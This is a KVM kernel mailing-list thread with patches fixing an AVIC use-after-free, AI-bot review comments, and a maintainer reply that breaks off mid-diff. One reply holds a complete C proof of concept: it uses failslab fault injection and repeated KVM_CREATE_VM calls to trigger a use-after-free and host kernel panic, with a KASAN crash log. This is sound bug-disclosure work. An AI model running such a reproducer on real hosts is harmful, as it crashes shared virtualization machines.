Kernel KVM virtualization development
 help / color / mirror / Atom feed
* [PATCH 0/2] KVM: SVM: Fix a (very) unlikely UAF for GA Log IRQs
@ 2026-06-25 22:09 Sean Christopherson
  2026-06-25 22:09 ` [PATCH 1/2] KVM: SVM: Remove VM from the GA Log notifier list before VM destruction Sean Christopherson
  2026-06-25 22:09 ` [PATCH 2/2] KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure Sean Christopherson
  0 siblings, 2 replies; 8+ messages in thread
From: Sean Christopherson @ 2026-06-25 22:09 UTC (permalink / raw)
  To: Sean Christopherson, Paolo Bonzini; +Cc: kvm, linux-kernel, Naveen N Rao

Fix a potential UAF due to freeing vCPUs while they're still reachable through
the global hashed list used to handle GA Log notifications.

Sean Christopherson (2):
  KVM: SVM: Remove VM from the GA Log notifier list before VM
    destruction
  KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure

 arch/x86/kvm/svm/avic.c | 22 +++++++++++-----------
 arch/x86/kvm/svm/svm.c  |  2 ++
 arch/x86/kvm/svm/svm.h  |  1 +
 3 files changed, 14 insertions(+), 11 deletions(-)


base-commit: a204badd8432f93b7e862e7dac6db0fe3d65f370
-- 
2.55.0.rc0.799.gd6f94ed593-goog


^ permalink raw reply	[flat|nested] 8+ messages in thread

* [PATCH 1/2] KVM: SVM: Remove VM from the GA Log notifier list before VM destruction
  2026-06-25 22:09 [PATCH 0/2] KVM: SVM: Fix a (very) unlikely UAF for GA Log IRQs Sean Christopherson
@ 2026-06-25 22:09 ` Sean Christopherson
  2026-06-25 22:26   ` sashiko-bot
  2026-06-25 22:09 ` [PATCH 2/2] KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure Sean Christopherson
  1 sibling, 1 reply; 8+ messages in thread
From: Sean Christopherson @ 2026-06-25 22:09 UTC (permalink / raw)
  To: Sean Christopherson, Paolo Bonzini; +Cc: kvm, linux-kernel, Naveen N Rao

When a VM is being destroyed, delete it from the list used to process GA
Log interrupt before vCPUs are freed, otherwise avic_ga_log_notifier()
could theoretically hit a use-after-free if a GA Log notification arrives
for a vCPU after the last reference to the VM has been put.

Note, in practice, it's likely all but impossible to trigger UAF, as all
all irqfds and thus all IRTEs are cleaned up by:

  kvm_irqfd_release()
  |
  |-> irqfd_deactivate()
      |
      |-> irqfd_shutdown()
          |
          |-> irq_bypass_unregister_consumer()

And kvm_irqfd_release() is guaranteed to run before the last reference to
the VM is put.  KVM also configures GA Log interrupts only when a vCPU is
blocking (older versions of KVM configre GA Log interrupts at all times,
but AVIC is off by default on those kernels).  Hitting UAF would require
tearing down a VM shortly after a vCPU stopped blocking, and with a very,
very delayed IRQ from hardware.

Note, calling avic_vm_pre_destroy() if avic_vm_init() fails is unnecessary,
as the VM hasn't yet been added to the list (the VM structure is zeroed on
allocation, and so hash_del() is a nop).  In fact, doing avic_vm_destroy()
at all on init failure is unnecessary now that the physical ID table is
allocated elsewhere; that will soon be remedied.

Opportunistically use guard() to avoid a local "flags" variable.

Fixes: 5881f73757cc ("svm: Introduce AMD IOMMU avic_ga_log_notifier")
Cc: stable@vger.kernel.org
Cc: Naveen N Rao (AMD) <naveen@kernel.org>
Signed-off-by: Sean Christopherson <seanjc@google.com>
---
 arch/x86/kvm/svm/avic.c | 15 ++++++++++-----
 arch/x86/kvm/svm/svm.c  |  2 ++
 arch/x86/kvm/svm/svm.h  |  1 +
 3 files changed, 13 insertions(+), 5 deletions(-)

diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
index 58e493a80cb0..6b100fb014a6 100644
--- a/arch/x86/kvm/svm/avic.c
+++ b/arch/x86/kvm/svm/avic.c
@@ -311,9 +311,18 @@ int avic_alloc_physical_id_table(struct kvm *kvm)
 	return 0;
 }
 
+void avic_vm_pre_destroy(struct kvm *kvm)
+{
+	if (WARN_ON_ONCE(!enable_apicv))
+		return;
+
+	guard(spinlock_irqsave)(&svm_vm_data_hash_lock);
+
+	hash_del(&to_kvm_svm(kvm)->hnode);
+}
+
 void avic_vm_destroy(struct kvm *kvm)
 {
-	unsigned long flags;
 	struct kvm_svm *kvm_svm = to_kvm_svm(kvm);
 
 	if (!enable_apicv)
@@ -322,10 +331,6 @@ void avic_vm_destroy(struct kvm *kvm)
 	free_page((unsigned long)kvm_svm->avic_logical_id_table);
 	free_pages((unsigned long)kvm_svm->avic_physical_id_table,
 		   avic_get_physical_id_table_order(kvm));
-
-	spin_lock_irqsave(&svm_vm_data_hash_lock, flags);
-	hash_del(&kvm_svm->hnode);
-	spin_unlock_irqrestore(&svm_vm_data_hash_lock, flags);
 }
 
 int avic_vm_init(struct kvm *kvm)
diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
index ef69a51ab27f..91b1e582d16f 100644
--- a/arch/x86/kvm/svm/svm.c
+++ b/arch/x86/kvm/svm/svm.c
@@ -5340,6 +5340,7 @@ struct kvm_x86_ops svm_x86_ops __initdata = {
 
 	.vm_size = sizeof(struct kvm_svm),
 	.vm_init = svm_vm_init,
+	.vm_pre_destroy = avic_vm_pre_destroy,
 	.vm_destroy = svm_vm_destroy,
 
 	.prepare_switch_to_guest = svm_prepare_switch_to_guest,
@@ -5712,6 +5713,7 @@ static __init int svm_hardware_setup(void)
 	enable_apicv = avic_hardware_setup();
 	if (!enable_apicv) {
 		enable_ipiv = false;
+		svm_x86_ops.vm_pre_destroy = NULL;
 		svm_x86_ops.vcpu_blocking = NULL;
 		svm_x86_ops.vcpu_unblocking = NULL;
 		svm_x86_ops.vcpu_get_apicv_inhibit_reasons = NULL;
diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
index 716be21fba33..a25f8994b877 100644
--- a/arch/x86/kvm/svm/svm.h
+++ b/arch/x86/kvm/svm/svm.h
@@ -946,6 +946,7 @@ extern struct kvm_x86_nested_ops svm_nested_ops;
 bool __init avic_hardware_setup(void);
 void avic_hardware_unsetup(void);
 int avic_alloc_physical_id_table(struct kvm *kvm);
+void avic_vm_pre_destroy(struct kvm *kvm);
 void avic_vm_destroy(struct kvm *kvm);
 int avic_vm_init(struct kvm *kvm);
 void avic_init_vmcb(struct vcpu_svm *svm, struct vmcb *vmcb);
-- 
2.55.0.rc0.799.gd6f94ed593-goog


^ permalink raw reply related	[flat|nested] 8+ messages in thread

* [PATCH 2/2] KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure
  2026-06-25 22:09 [PATCH 0/2] KVM: SVM: Fix a (very) unlikely UAF for GA Log IRQs Sean Christopherson
  2026-06-25 22:09 ` [PATCH 1/2] KVM: SVM: Remove VM from the GA Log notifier list before VM destruction Sean Christopherson
@ 2026-06-25 22:09 ` Sean Christopherson
  2026-06-25 22:25   ` sashiko-bot
  2026-06-29 13:27   ` Naveen N Rao
  1 sibling, 2 replies; 8+ messages in thread
From: Sean Christopherson @ 2026-06-25 22:09 UTC (permalink / raw)
  To: Sean Christopherson, Paolo Bonzini; +Cc: kvm, linux-kernel, Naveen N Rao

Don't bother calling avic_vm_destroy() when allocating the logical ID table
fails, as there is nothing to clean up now that the physical ID table is
allocated later, on-demand at first vCPU creation.

For all intents and purposes, no functional change intended, as calling
avic_vm_destroy() is a big nop in this case.

Fixes: 54ffe74cc4ab ("KVM: SVM: Move AVIC Physical ID table allocation to vcpu_precreate()")
Cc: Naveen N Rao (AMD) <naveen@kernel.org>
Signed-off-by: Sean Christopherson <seanjc@google.com>
---
 arch/x86/kvm/svm/avic.c | 7 +------
 1 file changed, 1 insertion(+), 6 deletions(-)

diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
index 6b100fb014a6..cd1761744e1d 100644
--- a/arch/x86/kvm/svm/avic.c
+++ b/arch/x86/kvm/svm/avic.c
@@ -336,7 +336,6 @@ void avic_vm_destroy(struct kvm *kvm)
 int avic_vm_init(struct kvm *kvm)
 {
 	unsigned long flags;
-	int err = -ENOMEM;
 	struct kvm_svm *kvm_svm = to_kvm_svm(kvm);
 	struct kvm_svm *k2;
 	u32 vm_id;
@@ -346,7 +345,7 @@ int avic_vm_init(struct kvm *kvm)
 
 	kvm_svm->avic_logical_id_table = (void *)get_zeroed_page(GFP_KERNEL_ACCOUNT);
 	if (!kvm_svm->avic_logical_id_table)
-		goto free_avic;
+		return -ENOMEM;
 
 	spin_lock_irqsave(&svm_vm_data_hash_lock, flags);
  again:
@@ -367,10 +366,6 @@ int avic_vm_init(struct kvm *kvm)
 	spin_unlock_irqrestore(&svm_vm_data_hash_lock, flags);
 
 	return 0;
-
-free_avic:
-	avic_vm_destroy(kvm);
-	return err;
 }
 
 static phys_addr_t avic_get_backing_page_address(struct vcpu_svm *svm)
-- 
2.55.0.rc0.799.gd6f94ed593-goog


^ permalink raw reply related	[flat|nested] 8+ messages in thread

* Re: [PATCH 2/2] KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure
  2026-06-25 22:09 ` [PATCH 2/2] KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure Sean Christopherson
@ 2026-06-25 22:25   ` sashiko-bot
  2026-06-29 13:27   ` Naveen N Rao
  1 sibling, 0 replies; 8+ messages in thread
From: sashiko-bot @ 2026-06-25 22:25 UTC (permalink / raw)
  To: Sean Christopherson; +Cc: kvm

Thank you for your contribution! Sashiko AI review found 1 potential issue(s) to consider:

Pre-existing issues:
- [Critical] Use-After-Free (UAF) due to missing `hash_del` in `kvm_create_vm` error path.
--

commit e695b91eb85c201025f5666d103667275ead16a1
Author: Sean Christopherson <seanjc@google.com>

KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure

This commit removes the avic_vm_destroy() call from the error path of
avic_vm_init(), since the physical ID table is now allocated on demand
during vCPU creation.

> diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
> --- a/arch/x86/kvm/svm/avic.c
> +++ b/arch/x86/kvm/svm/avic.c
[ ... ]
> @@ -367,10 +366,6 @@ int avic_vm_init(struct kvm *kvm)
>  	spin_unlock_irqrestore(&svm_vm_data_hash_lock, flags);
>  
>  	return 0;

[Severity: Critical]
This is a pre-existing issue, but could the error path in kvm_create_vm()
leave a freed kvm_svm node in the svm_vm_data_hash?

If kvm_create_vm() fails after calling kvm_arch_init_vm() (for example,
during kvm_create_vm_debugfs()), it handles the error by jumping to
the cleanup path and calling kvm_arch_destroy_vm().

However, this error path seems to bypass kvm_arch_pre_destroy_vm(), which
is where the hash node is normally removed:

avic_vm_pre_destroy() {
    ...
    hash_del(&to_kvm_svm(kvm)->hnode);
}

Since kvm_arch_free_vm() will then free the kvm structure, does this
leave a dangling pointer in the global hash table that could trigger a
use-after-free during subsequent VM creations or traversals?

> -
> -free_avic:
> -	avic_vm_destroy(kvm);
> -	return err;
>  }

-- 
Sashiko AI review · https://sashiko.dev/#/patchset/20260625220933.3357733-1-seanjc@google.com?part=2

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: [PATCH 1/2] KVM: SVM: Remove VM from the GA Log notifier list before VM destruction
  2026-06-25 22:09 ` [PATCH 1/2] KVM: SVM: Remove VM from the GA Log notifier list before VM destruction Sean Christopherson
@ 2026-06-25 22:26   ` sashiko-bot
  2026-06-28 18:30     ` XIAO WU
  0 siblings, 1 reply; 8+ messages in thread
From: sashiko-bot @ 2026-06-25 22:26 UTC (permalink / raw)
  To: Sean Christopherson; +Cc: kvm

Thank you for your contribution! Sashiko AI review found 2 potential issue(s) to consider:

New issues:
- [High] Moving `hash_del()` from `avic_vm_destroy()` to `avic_vm_pre_destroy()` causes a Use-After-Free if VM creation fails.

Pre-existing issues:
- [High] Time-Of-Check to Time-Of-Use (TOCTOU) race in `avic_ga_log_notifier()` leaves the vCPU pointer vulnerable to Use-After-Free.
--

(Note: The format of this report is altered to provide a free-form summary
without quoting the original patch code due to recitation restrictions.)

commit 0f798fdd5f5b3e142add9c440b53828de523723f
Author: Sean Christopherson <seanjc@google.com>

KVM: SVM: Remove VM from the GA Log notifier list before VM destruction

This commit moves the removal of the VM from the GA log notifier list
from avic_vm_destroy() to avic_vm_pre_destroy(). It also opportunistically
adopts guard() for locking in the pre-destroy hook.

[Severity: High]
Does this change introduce a use-after-free on the VM creation error path?

When kvm_create_vm() in virt/kvm/kvm_main.c encounters an error after
kvm_arch_init_vm() has already succeeded (for instance, if
kvm_init_mmu_notifier() fails due to memory exhaustion), the error unwind
path calls kvm_arch_destroy_vm(), but it completely bypasses
kvm_arch_pre_destroy_vm().

Since the removal of the hash node from svm_vm_data_hash was moved from
avic_vm_destroy() into avic_vm_pre_destroy(), this early failure path will
no longer execute the hash removal. Will this leave a dangling pointer in
the global hash table once the VM struct is freed by kvm_arch_free_vm(),
potentially crashing the host on subsequent hash table traversals?


[Severity: High]
This is a pre-existing issue, but does a time-of-check to time-of-use race
still exist in avic_ga_log_notifier() even with this patch applied?

In arch/x86/kvm/svm/avic.c, avic_ga_log_notifier() looks up the vCPU while
holding svm_vm_data_hash_lock. It then drops the lock before passing the
vCPU to kvm_vcpu_wake_up(). There does not appear to be any rcu_read_lock()
or reference counting protecting the vCPU memory during this window.

If the threaded IOMMU IRQ handler is preempted immediately after unlocking
but before kvm_vcpu_wake_up() executes, could another CPU finish destroying
the VM and free the vCPU via kvm_destroy_vcpus()? When the IRQ thread
resumes, it would attempt to wake up a freed vCPU pointer. Because the
active notifier thread isn't blocked by VM destruction, does moving the
hash removal earlier fully resolve the use-after-free risk?

-- 
Sashiko AI review · https://sashiko.dev/#/patchset/20260625220933.3357733-1-seanjc@google.com?part=1

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: [PATCH 1/2] KVM: SVM: Remove VM from the GA Log notifier list before VM destruction
  2026-06-25 22:26   ` sashiko-bot
@ 2026-06-28 18:30     ` XIAO WU
  0 siblings, 0 replies; 8+ messages in thread
From: XIAO WU @ 2026-06-28 18:30 UTC (permalink / raw)
  To: sashiko-reviews, Sean Christopherson; +Cc: kvm

Hi Sean,

Thanks for this patch series! The Sashiko AI review system flagged a
potential issue with this patch, and I was able to reproduce it -- a
KASAN slab-use-after-free triggers when the VM creation error path is
exercised via fault injection.

 > diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
 > index 58e493a80cb0..6b100fb014a6 100644
 > --- a/arch/x86/kvm/svm/avic.c
 > +++ b/arch/x86/kvm/svm/avic.c
 > @@ -311,9 +311,18 @@ int avic_alloc_physical_id_table(struct kvm *kvm)
 >      return 0;
 >  }
 >
 > +void avic_vm_pre_destroy(struct kvm *kvm)
 > +{
 > +    if (WARN_ON_ONCE(!enable_apicv))
 > +        return;
 > +
 > +    guard(spinlock_irqsave)(&svm_vm_data_hash_lock);
 > +
 > +    hash_del(&to_kvm_svm(kvm)->hnode);
 > +}

This moves hash_del() out of avic_vm_destroy() and into the new
avic_vm_pre_destroy().  The normal VM teardown path calls both:

   kvm_destroy_vm()
     -> kvm_arch_pre_destroy_vm()   // calls avic_vm_pre_destroy -> hash_del
     -> kvm_destroy_vcpus()
     -> kvm_arch_destroy_vm()       // calls avic_vm_destroy (no hash_del)

However, the error path in kvm_create_vm() does NOT call
kvm_arch_pre_destroy_vm():

   kvm_create_vm()
     -> kvm_arch_init_vm()          // succeeds -> avic_vm_init -> hash_add
     -> kvm_init_mmu_notifier()     // FAILS (e.g., -ENOMEM)
     -> goto out_err_no_mmu_notifier
       -> kvm_arch_destroy_vm()     // avic_vm_destroy -- no longer does 
hash_del
       -> kvm_arch_free_vm()        // frees kvm_svm with hnode still in 
hash

After this, the global svm_vm_data_hash contains a dangling hnode
pointing into freed memory.

--- Reproduction ---

Kernel: 7.1.0-ga868c399eeaa #2 SMP PREEMPT_DYNAMIC
Config: CONFIG_KASAN=y, CONFIG_FAILSLAB=y, CONFIG_KVM_AMD=y,
         CONFIG_FAULT_INJECTION=y, CONFIG_FAULT_INJECTION_DEBUG_FS=y
QEMU:  QEMU Standard PC (Q35 + ICH9, 2009)
Boot:  kvm_amd.avic=1 kvm_amd.force_avic=1 (NPT + AVIC force-enabled)

The PoC uses failslab fault injection to make kvm_init_mmu_notifier()
fail with -ENOMEM after kvm_arch_init_vm() has already succeeded (and
avic_vm_init() has added the VM to the hash table).  Each attempt runs
in a forked child so the mmu_notifier_subscriptions allocation is
always a first-time allocation.

--- KASAN Crash Log ---

[  697.157863][ T9682] BUG: KASAN: slab-use-after-free in 
avic_vm_init+0x352/0x3a0
[  697.159562][ T9682] Write of size 8 at addr ff1100010b75ba20 by task 
poc/9682
[  697.161750][ T9682] CPU: 0 UID: 0 PID: 9682 Comm: poc Tainted: G   
  U  W           7.1.0-ga868c399eeaa #2 PREEMPT(full)
[  697.161888][ T9682] Call Trace:
[  697.161905][ T9682]  <TASK>
[  697.161926][ T9682]  dump_stack_lvl+0x116/0x1f0
[  697.162022][ T9682]  print_report+0xf4/0x600
[  697.162275][ T9682]  kasan_report+0xe0/0x110
[  697.162438][ T9682]  ? avic_vm_init+0x352/0x3a0
[  697.162524][ T9682]  avic_vm_init+0x352/0x3a0
[  697.162602][ T9682]  svm_vm_init+0xc5/0x1c0
[  697.162659][ T9682]  kvm_arch_init_vm+0x19d/0x820
[  697.162819][ T9682]  kvm_dev_ioctl+0xb10/0x1a50
[  697.163422][ T9682]  __x64_sys_ioctl+0x193/0x210
[  697.163479][ T9682]  do_syscall_64+0x129/0x880
[  697.163537][ T9682]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[  697.163932][ T9682]  </TASK>
[  697.193129][ T9682] Allocated by task 17750:
[  697.194864][ T9682]  __kvmalloc_node_noprof+0x397/0x920
[  697.195370][ T9682]  kvm_dev_ioctl+0x15d/0x1a50
[  697.196681][ T9682]  __x64_sys_ioctl+0x193/0x210
[  697.196681][ T9682]  do_syscall_64+0x129/0x880
[  697.197226][ T9682]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[  697.197445][ T9682] Freed by task 17750:
[  697.199629][ T9682]  kfree+0x171/0x720
[  697.199997][ T9682]  kvm_dev_ioctl+0x5b4/0x1a50
[  697.200881][ T9682]  __x64_sys_ioctl+0x193/0x210
[  697.201310][ T9682]  do_syscall_64+0x129/0x880
[  697.201847][ T9682]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[  697.202066][ T9682] The buggy address belongs to the cache 
kmalloc-cg-8k of size 8192
[  697.203320][ T9682] The buggy address is located 6688 bytes inside of
[  697.203320][ T9682]  freed 8192-byte region [ff1100010b75a000, 
ff1100010b75c000)

[  704.158056][ T9682] BUG: unable to handle page fault for address: 
ffa000000278fa20
[  704.159842][ T9682] #PF: supervisor write access in kernel mode
[  704.164220][ T9682] Oops: Oops: 0002 [#1] SMP KASAN NOPTI
[  704.167928][ T9682] RIP: 0010:avic_vm_init+0x29a/0x3a0
[  704.216489][ T9682] Kernel panic - not syncing: Fatal exception

Note the call chain matches the review prediction exactly:
   avic_vm_init -> svm_vm_init -> kvm_arch_init_vm -> kvm_dev_ioctl

The allocation and free are both from kvm_dev_ioctl (KVM_CREATE_VM):
the first VM is freed on the error path, and the second VM creation
tries to traverse svm_vm_data_hash in avic_vm_init(), dereferencing
the freed kvm_svm.

--- PoC ---

Build:  gcc -o poc poc.c -static
Run:    ./poc

The kernel also needs the following boot parameters for AVIC:
   kvm_amd.avic=1 kvm_amd.force_avic=1

// SPDX-License-Identifier: GPL-2.0-only
/*
  * PoC for KVM SVM AVIC dangling pointer bug introduced by commit:
  * "KVM: SVM: Remove VM from the GA Log notifier list before VM 
destruction"
  *
  * BUG DESCRIPTION:
  * The patch moves hash_del() from avic_vm_destroy() to the new
  * avic_vm_pre_destroy().  On the VM creation error path in 
kvm_create_vm():
  *   1. kvm_arch_init_vm() succeeds -> calls avic_vm_init() -> adds to hash
  *   2. kvm_init_mmu_notifier() fails (ENOMEM from failslab on
  *      kzalloc(sizeof(mmu_notifier_subscriptions), GFP_KERNEL_ACCOUNT))
  *   3. kvm_arch_destroy_vm() is called, which calls avic_vm_destroy()
  *      but NOT avic_vm_pre_destroy()
  *   4. kvm_arch_free_vm() frees the kvm_svm with hnode still in hash
  *
  * KEY INSIGHT: The mmu_notifier_subscriptions allocation happens only ONCE
  * per process mm_struct. To try it many times, we must fork a child 
process
  * for each attempt, so each child has a fresh mm without 
notifier_subscriptions.
  */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/kvm.h>
#include <errno.h>

#define KVM_PATH "/dev/kvm"
#define FAILSLAB_PROBABILITY "/sys/kernel/debug/failslab/probability"
#define FAILSLAB_TIMES "/sys/kernel/debug/failslab/times"
#define FAILSLAB_INTERVAL "/sys/kernel/debug/failslab/interval"
#define FAILSLAB_IGNORE_GFP_WAIT 
"/sys/kernel/debug/failslab/ignore-gfp-wait"
#define FAILSLAB_TASK_FILTER "/sys/kernel/debug/failslab/task-filter"

static int write_int(const char *path, int val)
{
     int fd = open(path, O_WRONLY);
     if (fd < 0) return -1;
     char buf[64];
     int len = snprintf(buf, sizeof(buf), "%d", val);
     write(fd, buf, len);
     close(fd);
     return 0;
}

static int write_str(const char *path, const char *val)
{
     int fd = open(path, O_WRONLY);
     if (fd < 0) return -1;
     write(fd, val, strlen(val));
     close(fd);
     return 0;
}

/* Child process: try to create a KVM VM.
  * Returns via exit code: 0=success, 1=ENOMEM failure */
static void try_create_vm(int kvm_fd)
{
     int vm_fd;

     vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
     if (vm_fd >= 0) {
         close(vm_fd);
         _exit(0);
     }

     if (errno == ENOMEM)
         _exit(1);
     _exit(2);
}

int main(void)
{
     int kvm_fd;
     int iter, status;
     int success = 0, enomem_fails = 0, other_fails = 0;
     pid_t pid;

     setbuf(stdout, NULL);
     setbuf(stderr, NULL);

     fprintf(stderr, "[.] Opening /dev/kvm...\n");
     kvm_fd = open(KVM_PATH, O_RDWR);
     if (kvm_fd < 0) {
         perror("open /dev/kvm");
         return 1;
     }
     fprintf(stderr, "[+] /dev/kvm opened\n");

     fprintf(stderr, "[.] Configuring failslab fault injection...\n");
     if (write_int(FAILSLAB_PROBABILITY, 3) < 0) {
         fprintf(stderr, "[-] Cannot configure failslab\n");
         close(kvm_fd);
         return 1;
     }
     write_int(FAILSLAB_TIMES, 100000000);
     write_int(FAILSLAB_INTERVAL, 1);
     write_str(FAILSLAB_IGNORE_GFP_WAIT, "N");
     write_str(FAILSLAB_TASK_FILTER, "N");
     fprintf(stderr, "[+] Fault injection configured (prob=3%%)\n");

     fprintf(stderr, "[.] Creating VMs in child processes...\n");

     for (iter = 0; iter < 50000; iter++) {
         pid = fork();
         if (pid == 0) {
             try_create_vm(kvm_fd);
         }

         waitpid(pid, &status, 0);

         if (WIFEXITED(status)) {
             int exit_code = WEXITSTATUS(status);
             if (exit_code == 0) {
                 success++;
             } else if (exit_code == 1) {
                 enomem_fails++;
                 fprintf(stderr, "[!] ENOMEM at iter=%d (success=%d, 
enomem=%d)\n",
                     iter, success, enomem_fails);

                 /* After a dangling hash entry was created,
                  * further VMs will trigger use-after-free. */
                 int j;
                 for (j = 0; j < 100; j++) {
                     pid_t pid2 = fork();
                     if (pid2 == 0) {
                         try_create_vm(kvm_fd);
                     }
                     waitpid(pid2, NULL, 0);
                 }
             } else {
                 other_fails++;
             }
         }

         if (iter % 5000 == 0) {
             fprintf(stderr, "[.] iter=%d success=%d enomem=%d other=%d\n",
                 iter, success, enomem_fails, other_fails);
         }
     }

     fprintf(stderr, "[+] FINAL: success=%d enomem=%d other=%d\n",
         success, enomem_fails, other_fails);

     close(kvm_fd);
     return 0;
}

Thanks,
Xiao


^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: [PATCH 2/2] KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure
  2026-06-25 22:09 ` [PATCH 2/2] KVM: SVM: Drop unnecessary avic_vm_destroy() call on init failure Sean Christopherson
  2026-06-25 22:25   ` sashiko-bot
@ 2026-06-29 13:27   ` Naveen N Rao
  2026-06-30  0:17     ` Sean Christopherson
  1 sibling, 1 reply; 8+ messages in thread
From: Naveen N Rao @ 2026-06-29 13:27 UTC (permalink / raw)
  To: Sean Christopherson; +Cc: Paolo Bonzini, kvm, linux-kernel

On Thu, Jun 25, 2026 at 03:09:33PM -0700, Sean Christopherson wrote:
> Don't bother calling avic_vm_destroy() when allocating the logical ID table
> fails, as there is nothing to clean up now that the physical ID table is
> allocated later, on-demand at first vCPU creation.
> 
> For all intents and purposes, no functional change intended, as calling
> avic_vm_destroy() is a big nop in this case.
> 
> Fixes: 54ffe74cc4ab ("KVM: SVM: Move AVIC Physical ID table allocation to vcpu_precreate()")
> Cc: Naveen N Rao (AMD) <naveen@kernel.org>
> Signed-off-by: Sean Christopherson <seanjc@google.com>
> ---
>  arch/x86/kvm/svm/avic.c | 7 +------
>  1 file changed, 1 insertion(+), 6 deletions(-)

This LGTM, though I'm not sure this deserves a fixes tag.

FWIW, I have had a patch (part of a larger series I am going to post 
soon) to move the logical_id_table allocation alongside the physical ID 
table allocation. I'm fine if you want to queue your patch first, but 
this is what I have locally:

--
    KVM: SVM: Consolidate allocation of AVIC Physical and Logical ID 
    tables
    
    Allocate AVIC Logical ID table alongside AVIC Physical ID table
    allocation in avic_alloc_physical_id_table() so as to keep allocations
    of both AVIC related data structures together. Rename the function to
    avic_vcpu_precreate() to reflect when it is invoked since it no longer
    allocates only the Physical ID table. Convert avic_vm_init() to return a
    void since it can no longer fail.
    
    Signed-off-by: Naveen N Rao (AMD) <naveen@kernel.org>

diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
index 716be21fba33..722855be706f 100644
--- a/arch/x86/kvm/svm/svm.h
+++ b/arch/x86/kvm/svm/svm.h
@@ -945,9 +945,9 @@ extern struct kvm_x86_nested_ops svm_nested_ops;
 
 bool __init avic_hardware_setup(void);
 void avic_hardware_unsetup(void);
-int avic_alloc_physical_id_table(struct kvm *kvm);
+int avic_vcpu_precreate(struct kvm *kvm);
 void avic_vm_destroy(struct kvm *kvm);
-int avic_vm_init(struct kvm *kvm);
+void avic_vm_init(struct kvm *kvm);
 void avic_init_vmcb(struct vcpu_svm *svm, struct vmcb *vmcb);
 int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu);
 int avic_unaccelerated_access_interception(struct kvm_vcpu *vcpu);
diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
index 0726f88e679a..fb5933c7421d 100644
--- a/arch/x86/kvm/svm/avic.c
+++ b/arch/x86/kvm/svm/avic.c
@@ -293,7 +293,7 @@ static int avic_get_physical_id_table_order(struct kvm *kvm)
 	return get_order((__avic_get_max_physical_id(kvm, NULL) + 1) * sizeof(u64));
 }
 
-int avic_alloc_physical_id_table(struct kvm *kvm)
+int avic_vcpu_precreate(struct kvm *kvm)
 {
 	struct kvm_svm *kvm_svm = to_kvm_svm(kvm);
 
@@ -303,10 +303,16 @@ int avic_alloc_physical_id_table(struct kvm *kvm)
 	if (kvm_svm->avic_physical_id_table)
 		return 0;
 
+	kvm_svm->avic_logical_id_table = (void *)get_zeroed_page(GFP_KERNEL_ACCOUNT);
+	if (!kvm_svm->avic_logical_id_table)
+		return -ENOMEM;
+
 	kvm_svm->avic_physical_id_table = (void *)__get_free_pages(GFP_KERNEL_ACCOUNT | __GFP_ZERO,
 								   avic_get_physical_id_table_order(kvm));
-	if (!kvm_svm->avic_physical_id_table)
+	if (!kvm_svm->avic_physical_id_table) {
+		free_page((unsigned long)kvm_svm->avic_logical_id_table);
 		return -ENOMEM;
+	}
 
 	return 0;
 }
@@ -328,20 +334,15 @@ void avic_vm_destroy(struct kvm *kvm)
 	spin_unlock_irqrestore(&svm_vm_data_hash_lock, flags);
 }
 
-int avic_vm_init(struct kvm *kvm)
+void avic_vm_init(struct kvm *kvm)
 {
 	unsigned long flags;
-	int err = -ENOMEM;
 	struct kvm_svm *kvm_svm = to_kvm_svm(kvm);
 	struct kvm_svm *k2;
 	u32 vm_id;
 
 	if (!enable_apicv)
-		return 0;
-
-	kvm_svm->avic_logical_id_table = (void *)get_zeroed_page(GFP_KERNEL_ACCOUNT);
-	if (!kvm_svm->avic_logical_id_table)
-		goto free_avic;
+		return;
 
 	spin_lock_irqsave(&svm_vm_data_hash_lock, flags);
  again:
@@ -360,12 +361,6 @@ int avic_vm_init(struct kvm *kvm)
 	kvm_svm->avic_vm_id = vm_id;
 	hash_add(svm_vm_data_hash, &kvm_svm->hnode, kvm_svm->avic_vm_id);
 	spin_unlock_irqrestore(&svm_vm_data_hash_lock, flags);
-
-	return 0;
-
-free_avic:
-	avic_vm_destroy(kvm);
-	return err;
 }
 
 static phys_addr_t avic_get_backing_page_address(struct vcpu_svm *svm)
diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
index e6408c3e8419..a9a4fc105c6b 100644
--- a/arch/x86/kvm/svm/svm.c
+++ b/arch/x86/kvm/svm/svm.c
@@ -1308,7 +1308,7 @@ void svm_switch_vmcb(struct vcpu_svm *svm, struct kvm_vmcb_info *target_vmcb)
 
 static int svm_vcpu_precreate(struct kvm *kvm)
 {
-	return avic_alloc_physical_id_table(kvm);
+	return avic_vcpu_precreate(kvm);
 }
 
 static int svm_vcpu_create(struct kvm_vcpu *vcpu)
@@ -5302,12 +5302,7 @@ static int svm_vm_init(struct kvm *kvm)
 	if (!pause_filter_count || !pause_filter_thresh)
 		kvm_disable_exits(kvm, KVM_X86_DISABLE_EXITS_PAUSE);
 
-	if (enable_apicv) {
-		int ret = avic_vm_init(kvm);
-		if (ret)
-			return ret;
